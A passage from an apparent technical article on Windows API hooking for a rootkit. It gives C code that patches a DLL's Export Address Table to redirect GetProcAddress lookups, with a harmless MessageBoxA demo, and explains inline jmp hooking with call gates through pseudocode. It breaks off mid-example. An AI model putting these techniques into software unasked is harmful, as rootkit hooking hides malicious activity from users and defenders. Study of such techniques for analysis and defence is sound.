  DWORD i, baseAddr; /* Counter, and module base address */
  DWORD* ENT; /* Export Name Table */
  DWORD* AOF; /* Address Of Functions */
  WORD* AONO; /* Address Of Names Ordinal */

  /* Set up base address */
  baseAddr = DWORD(hMod);
  
  /* Build NT headers pointer */
  pNTHeader = RVA2OFS(PIMAGE_NT_HEADERS, pDOSHeader, pDOSHeader->e_lfanew);
  
  /* Build Export Section pointer */
  pExportDir = RVA2OFS(PIMAGE_EXPORT_DIRECTORY, hMod, pNTHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
  /* Scan through ENT */
  for( i=0 ; i<pExportDir->NumberOfFunctions ; i++ )
  {
      /* Compute ExportNameTable[i]’s address */
      ENT = RVA2OFS(DWORD*, baseAddr, ((DWORD)pExportDir->AddressOfNames + (sizeof(DWORD)*i)));

          /* Perform module name check */
      if( strcmp( (char*)(baseAddr + *ENT), ApiName ) == 0 )
      {
            /* Build pointers:
              AONO: to Address Of Names Ordinal
              AOF : to Address Of Functions */

              AONO = RVA2OFS(WORD*, baseAddr, ((DWORD)
              pExportDir->AddressOfNameOrdinals + (i*sizeof(WORD))) );
              AOF = RVA2OFS(DWORD*, baseAddr, ((DWORD) pExportDir->AddressOfFunctions + (sizeof(DWORD) * *AONO)) );
            
        /* Return API RVA storage location */
        return (AOF);
      }
  }
 
 /* Not found, return failure */
 return 0;
}

The function above is the core of the following EAT hijack engine.

/*
This function calls EAT_GetPointerToApiAddress to get the storage location of the API address, and then patches it to hijack futur researchs of the real address, by the loader, GetProcAddress, or similar methods.
*/
int EAT_Hijack(HMODULE hDll, char* ApiName, void** OldApiAddr, void* newApiAddr)
{
  DWORD *p,lpflOldProtect,lpflOldProtect2;
  p = EAT_GetPointerToApiAddress(hDll, ApiName); /* Get Api’s address
  storage location */
  *OldApiAddr = (void*)(*p+DWORD(hDll)); /* Save old API address */

  /* Patch function address in EAT : */
  VirtualProtect(p, sizeof(DWORD), PAGE_READWRITE, &lpflOldProtect);
  *p = ((DWORD)newApiAddr)-DWORD(hDll); /* Set new RVA value */
  VirtualProtect(p, sizeof(DWORD), lpflOldProtect, &lpflOldProtect2)

return 1;
}

The use of the engine is not obvious so a small example replacing MessageBoxA follows.

This is our replacement function for MessageBoxA:
/* Pointer to MessageBoxA function */
typedef int (WINAPI* pMessageBoxA)(HWND, LPCTSTR, LPCTSTR, UINT);
pMessageBoxA fMessageBoxA; /* Pointer used to test hijacking */
pMessageBoxA oldfMessageBoxA; /* Pointer that will be used to store the genuine address of the API */

/* MessageBoxA replacement */
int WINAPI MyMessageBoxA(HWND hWnd,LPCTSTR lpText,LPCTSTR lpCaption,UINT uType)
{
  oldfMessageBoxA(NULL,lpText,’Title HIJACKED’,MB_OK);
  return 0;
}

Demonstration program:
int main(int argc, char *argv[])
{
  HMODULE hDll; /* user32 module handle */
  hDll = GetModuleHandle(‘user32.dll’); /* Get user32 base address */
  
  /* BEFORE EAT hijack */
  fMessageBoxA = (pMessageBoxA) GetProcAddress(hDll,’MessageBoxA’);
  fMessageBoxA(NULL,’MessageBoxA before hijack’, ‘MessageBoxA not hijacked’,MB_OK);
  
  /* Patch EAT now… */
  EAT_Hijack(hDll, ‘MessageBoxA’, (VOID**)(&oldfMessageBoxA),
 ((VOID*)(&MyMessageBoxA)));

  /* AFTER EAT hijack */
  /* Update function pointer to use hijacked function (simulation) */
  fMessageBoxA = (pMessageBoxA) ((DWORD)(&MyMessageBoxA));
  fMessageBoxA(NULL,’MessageBoxA AFTER hijack’,’Title overwritten
   :p’,MB_OK);

  oldfMessageBoxA(NULL,’MessageBoxA using saved address’,’MessageBoxA
(SAVED ADDRESS)’,MB_OK);
  return 0;
}

Inserting an unconditional jump (jmp) – Overview:
This technique involves modifying the machine code of a given API so that it executes an unconditional jump to a replacement function. Thus any call direct or indirect to the hooked API will inevitably be redirected to the new function. This is the type of function redirection used by the Microsoft Detours Library. In theory, redirection by inserting of an unconditional jump is simple: you simply locate the entry point of the API to be hijacked an insert an unconditional jump to the new function. This technique make us lose the ability to call the original API.
However, there is a solution for calling the original API. It involves creating a buffer containing the original version of the API’s modified memory zone, followed by a jump to and address located 5 bytes after the start of the zone. This jump allows to continue the execution of the original function just after the unconditional jump that performs the redirection to the replacement function.
One detail that I voluntarily left out until now: the problem of disassembling instructions. In machine code, instructions have a variable length. How can we write an unconditional five-byte jump while being sure not to damage the target code (‘cutting an instruction in half’)? The answer is simple: in most cases we just use a basic disassembly engine. It allows to recover as many complete instructions as required to reach the size of five bytes, i.e. the area just big enough the insert the unconditional jump. Concretely, in memory, all the operations result in:

Hijacking
  Before After Call Gate
API_target() API_target() API_CallGate()

push ebp jmp @New_API push ebp
mov ebp, esp mov ebp, esp
push ebx push ebx
push esi push esi
        
push edi push edi jump @API_target+5

We can see that the role of the redirection engine is to modify the smallest possible zone of the targeted API, so as to insert a jump without causing any damage, while maintaining the ability to call it. This is done by saving the code before it is modified to a call buffer or call gate. As explained above, the call gate arranges a call just after the unconditional jump inserted in the original API. At that point, all that remains is to declare a FARPROC pointing to that buffer, then to make a call as when resolving the address by GetProcAddress. The useful redirection engine used in the rootkit is the one created by Z0MbiE (see Zombie2).

…and getting deeper:
As explained above, the role of this hijack engine is to insert an unconditional jump at a given address to a replacement function, while leaving the possibility of calling the API as it was originally behaving.
This is achieved via the ForgeHook(DWORD pAddr, DWORD pAddrToJump, byte **Buffer) function. It takes three parameters.
 – the address where the hook should be inserted (the API entry point)
 – the memory address that the jump will point to (the replacement API)
 – the address of a pointer used to save the address of the call gate, path to the unhooked API.

Let’s start by analysing the code operation:

 * Find where to insert the jump:
WHILE CollectedSpace < JUMP SIZE:
 – RETRIEVE THE INSTRUCTION SIZE AT ADDRESS pAddr
 – UPDATE THE VALUE OF CollectedSpace
 – GO TO THE NEXT INSTRUCTION: pAddr += SIZE OF THE CURRENT INSTRUCTION

 * Create the call gate
 – ALLOCATE MEMORY FOR THE CALL GATE: SIZE OF THE COLLECTION AREA + SIZE OF A JUMP
 – COPY THE INSTRUCTIONS FROM THE COLLECTION AREA TO THE CALL GATE
 – ADD TO THE CALL GATE A JUMP TO pAddr + CollectedSpace (thereby straddling the hijacking area)

 * Insert the hook in the API code:
 – CLEAR THE COLLECTED AREA WITH NOPs
 – INSERT A JUMP TO pAddrToJump (hook)

The delicate point that remains is how to create a jump directly in machine code. This is done by using the GenJmp(DWORD To, DWORD From) function which will perform the operation into two steps by inserting:
 – the opcode for an unconditional relative jump: 0xE9
 – the relative address to jump to, based on a simple formula: To From 5 (in 4 bytes)

For example, you would set a jump at address 0x98765 to the address 0x12

Categories: Reviews